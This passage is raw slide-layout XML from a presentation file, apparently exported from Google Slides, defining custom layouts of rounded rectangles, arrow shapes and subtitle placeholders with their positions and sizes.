          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667"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09" name="Google Shape;209;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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 name="Google Shape;210;p19"/>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6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="212" name="Shape 212"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p20"/>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2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16" name="Google Shape;216;p2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17" name="Google Shape;217;p2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18" name="Google Shape;218;p2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19" name="Google Shape;219;p2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20" name="Google Shape;220;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="221" name="Google Shape;221;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22" name="Google Shape;222;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20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150"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4" name="Google Shape;224;p20"/>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 name="Google Shape;225;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226" name="Google Shape;226;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27" name="Google Shape;227;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8" name="Google Shape;228;p20"/>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9" name="Google Shape;229;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="230" name="Google Shape;230;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1" name="Google Shape;231;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 name="Google Shape;232;p20"/>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3" name="Google Shape;233;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="234" name="Google Shape;234;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5" name="Google Shape;235;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 name="Google Shape;236;p20"/>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 name="Google Shape;237;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="238" name="Google Shape;238;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39" name="Google Shape;239;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20"/>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1" name="Google Shape;241;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="242" name="Google Shape;242;p20"/>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43" name="Google Shape;243;p20"/>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 name="Google Shape;244;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="18488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5" name="Google Shape;245;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="24399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6" name="Google Shape;246;p20"/>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7" name="Google Shape;247;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="3622088"/>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8" name="Google Shape;248;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="42361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19" name="Google Shape;19;p3"/>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21" name="Google Shape;21;p3"/>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22" name="Google Shape;22;p3"/>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3" name="Google Shape;23;p3"/>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3"/>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25" name="Google Shape;25;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="584735" y="1058550"/>
            <a:ext cx="2560322" cy="1920238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;26;p3"/>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6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="249" name="Shape 249"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="123782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52" name="Google Shape;252;p2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53" name="Google Shape;253;p2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54" name="Google Shape;254;p2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55" name="Google Shape;255;p2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56" name="Google Shape;256;p2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57" name="Google Shape;257;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="258" name="Google Shape;258;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59" name="Google Shape;259;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0" name="Google Shape;260;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12225" y="127465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61" name="Google Shape;261;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="182890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 name="Google Shape;262;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="263" name="Google Shape;263;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64" name="Google Shape;264;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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2419975"/>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1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="267" name="Google Shape;267;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68" name="Google Shape;268;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9" name="Google Shape;269;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3011050"/>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0" name="Google Shape;270;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="271" name="Google Shape;271;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AFC0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72" name="Google Shape;272;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="333375" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AFC0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21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3602138"/>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4" name="Google Shape;274;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="275" name="Google Shape;275;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="4863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76" name="Google Shape;276;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="333375" cy="188625"/>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21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="4193263"/>
            <a:ext cx="75171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 name="Google Shape;278;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="279" name="Google Shape;279;p21"/>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0" name="Google Shape;280;p21"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1858813"/>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2" name="Google Shape;282;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12250" y="2439925"/>
            <a:ext cx="91440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3" name="Google Shape;283;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="30310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4" name="Google Shape;284;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="3622100"/>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5" name="Google Shape;285;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="4236125"/>
            <a:ext cx="9168600" cy="4464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7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="286" name="Shape 286"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="11616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89" name="Google Shape;289;p2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290" name="Google Shape;290;p2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291" name="Google Shape;291;p2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292" name="Google Shape;292;p2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293" name="Google Shape;293;p2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294" name="Google Shape;294;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1149803"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="295" name="Google Shape;29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296" name="Google Shape;29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7" name="Google Shape;297;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11753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98" name="Google Shape;298;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="16842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22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1672428"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="Google Shape;30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01" name="Google Shape;30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 name="Google Shape;302;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125" y="16979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3" name="Google Shape;303;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="220740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4" name="Google Shape;304;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2195578"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="305" name="Google Shape;30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06" name="Google Shape;30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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222110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08" name="Google Shape;308;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="27300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9" name="Google Shape;309;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2718203"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="310" name="Google Shape;31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11" name="Google Shape;31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 name="Google Shape;312;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125" y="27437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3" name="Google Shape;313;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="3252650"/>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 name="Google Shape;314;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3240828"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Google Shape;31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16" name="Google Shape;31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 name="Google Shape;317;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="3266350"/>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8" name="Google Shape;318;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="377527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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3763453"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="320" name="Google Shape;320;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21" name="Google Shape;321;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 name="Google Shape;322;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="378897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3" name="Google Shape;323;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="4323425"/>
            <a:ext cx="76401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 name="Google Shape;324;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="4311603"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="325" name="Google Shape;325;p22"/>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26" name="Google Shape;326;p22"/>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7" name="Google Shape;327;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="4337125"/>
            <a:ext cx="8869800" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="146302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8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="328" name="Shape 328"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p2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0" name="Google Shape;330;p2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31" name="Google Shape;331;p2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33" name="Google Shape;333;p2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34" name="Google Shape;334;p2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5" name="Google Shape;335;p23"/>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 name="Google Shape;336;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="337" name="Google Shape;33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38" name="Google Shape;33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9" name="Google Shape;339;p23"/>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0" name="Google Shape;340;p23"/>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23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="342" name="Google Shape;34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43" name="Google Shape;34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3"/>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5" name="Google Shape;345;p23"/>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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347" name="Google Shape;34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48" name="Google Shape;34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 name="Google Shape;349;p23"/>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0" name="Google Shape;350;p23"/>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 name="Google Shape;351;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="352" name="Google Shape;35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53" name="Google Shape;35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 name="Google Shape;354;p23"/>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55" name="Google Shape;355;p23"/>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23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="357" name="Google Shape;35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358" name="Google Shape;35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23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="21353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0" name="Google Shape;360;p23"/>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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="362" name="Google Shape;36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363" name="Google Shape;36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 name="Google Shape;364;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1225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5" name="Google Shape;365;p23"/>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 name="Google Shape;366;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="367" name="Google Shape;367;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368" name="Google Shape;368;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23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="12590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0" name="Google Shape;370;p23"/>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1" name="Google Shape;371;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="372" name="Google Shape;372;p23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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373" name="Google Shape;373;p23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1697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8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="375" name="Shape 375"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p2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77" name="Google Shape;377;p2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378" name="Google Shape;378;p2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379" name="Google Shape;379;p2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380" name="Google Shape;380;p2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381" name="Google Shape;381;p2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2" name="Google Shape;382;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179113" y="387300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 name="Google Shape;383;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="384" name="Google Shape;38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5" name="Google Shape;38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6" name="Google Shape;386;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="387312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7" name="Google Shape;387;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179000" y="431111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 name="Google Shape;388;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
